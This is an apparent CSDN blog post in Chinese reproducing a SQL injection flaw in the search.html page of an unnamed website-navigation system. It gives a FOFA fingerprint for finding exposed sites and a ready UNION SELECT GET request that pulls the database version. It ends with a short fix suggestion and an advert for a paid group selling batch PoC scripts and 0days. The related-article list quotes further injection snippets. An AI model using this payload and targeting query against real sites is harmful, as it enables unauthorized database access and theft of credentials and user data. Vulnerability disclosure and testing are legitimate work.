某网址导航页 搜索页面存在SQL注入漏洞

最新推荐文章于 2024-06-28 15:14:02 发布
最新推荐文章于 2024-06-28 15:14:02 发布
阅读量517 收藏 9
点赞数 10
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39894062/article/details/139131861
版权

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

某网址导航系统是一种智能化的网址导航平台,旨在帮助用户快速找到所需的网址和资源。该系统提供了智能化的网址搜索和推荐功能,能够根据用户的搜索习惯和偏好推荐相关的网址和资源。同时,系统还提供了网址分类、网址收藏和网址分享等功能,方便用户管理和共享网址。

0x03 漏洞威胁

某网址导航页 search.html 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x04 漏洞环境

FOFA:

body="./templates/antidote/css/style.css"

0x05 漏洞复现

POC

GET /search.html?keyword='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x2d2d2d2d2d,version(),0x2d2d2d2d2d),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: keep-alive

查询数据库版本

0x06 批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

使用参数化查询或存储过程来执行 SQL 查询

升级至安全版本

0x08 加入我们

漏洞详情及批量检测POC工具请前往知识星球获取

知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等

「星球介绍」:

本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。

本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。

本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。

「星球服务」:

加入星球,你会获得:

♦ 批量验证漏洞POC脚本

♦ 0day、1day分享

♦ 汇集其它付费星球资源分享

♦ 大量的红蓝对抗实战资源

♦ 优秀的内部红蓝工具及插件

♦ 综合类别优秀Wiki文库及漏洞库

♦ 提问及技术交流

鲨鱼辣椒丶D
关注
专栏目录
六零导航页SQL注入漏洞复现(CVE-2023-45951)
0xSec
10-26 1850
LyLme Spage v1.7.0版本存在安全漏洞,该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞,未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。
java的SQL注入与XSS攻击
热门推荐
weixin_44976692的博客
01-15 2万+
通过了解和防范SQL注入和XSS攻击,我们能够提高Java应用的安全性,保护用户的信息免受威胁。大家好,欢迎来到本文!在Java开发中,安全问题一直备受关注,其中SQL注入和XSS攻击是两个常见的安全隐患。是一种攻击手段,通过在应用的用户输入中注入恶意的SQL代码,从而篡改、查询或者删除数据库中的数据。攻击者通过构造精巧的输入,使应用误认为这些输入是合法的SQL语句。**XSS攻击(跨站脚本攻击)**则是通过在Web页面注入恶意脚本,使用户在浏览器上执行这些脚本,从而盗取用户信息或者执行一些恶意操作。
搜索型SQL及xx型注入漏洞练习
北冥有鱼
03-24 2197
我们在pikachu平台上点击搜索注入 我们随便输入一个字,出现上图结果,我们猜测后台应该是用了搜索逻辑 在数据库中它用了like ,来模糊的匹配相应的信息,然后就会把用户名中包含k的查出来 我们按照这样的逻辑,就可以去构造对应的闭合,还是用刚才的思路 like '% %' 中间的payload我们用xxxx%' or 1=1# 来构建 前面的%'是用来抵消单引号 后面的 #是为了...
搜索框注入
cnbird's blog
07-16 2万+
如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊 曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是
搜索框——不能忽视的XSS漏洞搜索框所引起的XSS漏洞
06-12
我刚入行的时候做过一个小小的页面工具,其中有一个步骤是把一些代码输出到页面上,当时我用的是php做的,写了个for循环,读取每一行的内容,然后echo出来。但是我发现页面排版老是那么的乱,怎么缩进都没有了?有一些代码还显示不出来?这太让我纳闷了,于是问一个学长是怎么一回事,他说:“当然啦,你输出的内容被浏览器解释过后的样子就是这样子的了,比如说你的空格浏览器是不承认的,你要输出空格就得用nbsp; ……”这时我才反应过来:“哦,原来如此……”。那时我才知道,在html的输出上代码和内容还是得程序员自己去区分的。
SQL注入学习记录Pikachu漏洞练习平台 搜索注入
qq_45653588的博客
05-27 554
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索注入又称为文本框注入。 2)原理 $sql="select * from user where password like '
SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
fendo
02-26 1万+
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
自己动手编写SQL注入漏洞扫描器
12-24
每个等级对应着不同程度的安全风险,如存在SQL注入漏洞、敏感信息泄露等。 - **扫描策略** - 对于输入的目标网站,首先需要构建一个基于网站结构的模型。理想情况下,可以将网站视为一棵树状结构,其中首页作为根...
漏洞挖掘】——121、Xpath注入深入刨析
最新发布
Fly_鹏程万里
06-28 167
XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。
MobSF如何检测App中是否有SQL注入漏洞
06-06
使用MobSF检测App中是否存在SQL注入漏洞可以按照以下步骤来进行: 1. 安装并启动MobSF,进入Web界面。 2. 点击左侧导航栏中的“Upload App”选项,上传需要检测的App文件。 3. 上传完成后,点击左侧导航栏中的“Run...
网络安全之pikachu搜索注入实战
weixin_44255593的博客
03-03 852
实例讲解: 1.搜索注入漏洞产生的原因:   在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索注入漏洞,又称文本框注入。 2.搜索注入的类型:   同其他注入类型相同,由于提交表单的不同,可分为GET型(多出现于网站上的搜索)和POST型(多出现于用户名的登录搜索匹配),搜索注入是国内系统中普遍存在漏洞。 3.原理分析: select username,id,email from member where usern
SQL注入漏洞攻防
m0_59418948的博客
12-01 267
SQL注入漏洞攻防
常见的web漏洞sql注入
weixin_47399833的博客
11-17 1807
简单学习一下网络安全
mysql搜索注入_pikachu-搜索注入 #手工注入
weixin_28745525的博客
02-28 345
1.搜索注入漏洞产生的原因:在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索注入漏洞,又称文本框注入。2.搜索注入的类型:同其他注入类型相同,由于提交表单的不同,可分为GET型(多出现于网站上的搜索)和POST型(多出现于用户名的登录搜索匹配),搜索注入是国内系统中普遍存在漏洞。3.原理分析:select us...
Xss基础
weixin_62693307的博客
02-23 429
检测关键字(还是和编码绕过一样,但后台源码中加入了其他的东西,例如strpos函数,这个意思是输入的字符串里面必须要有某些特定的字符(http://)而我们可以把它加上在注释掉就行了)通过广撒网或者其它指定的方式,将存储型xss放在具有xss漏洞的网站上,只要有用户去点击,即可进行攻击,也可以自己去找寻攻击对象,所以攻击范围更广。Xss攻击盗取web终端用户的敏感数据,甚至控制用户终端操作;Xss和sql注入攻击的指令都是由黑客通过用户输入域注入的,但xss注入的是html,而sql注入的是sql命令。
如何判断是字符型注入还是整形注入
欢迎光临
11-25 6981
1、数字型注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; (2) 加and 1=1 ,URL:www.text.com/tex...
搜索SQL注入及SQL漏洞测试
weixin_44720762的博客
03-31 5452
搜索注入原理和数据型,字符型注入相差不大,都是通过构造一个合法的语句,当参数传入后台后,造成一个合法的SQL语句闭合,从而将数据库里的数据遍历出来。 首先打开客户端寻找纯在SQL注入漏洞注入点。 通过提示可知,尝试输入一个提示字符进行搜索,z 这里我们输入字母’l’,可以看见后台给出的相关信息。 通过后台给出的数据,和平台给的输入提示。我们可以设想后台是否用了搜索逻辑去进行相关数据的搜索从而...
安全测试-sql注入搜索框
weixin_43793563的博客
07-29 4588
一、搜索注入简介与原理1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,...
【网络安全】网站漏洞挖掘思路
Javachichi的博客
01-05 945
哈喽,大家好,本篇主要分享网站漏洞思路,希望你看完有所收获。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值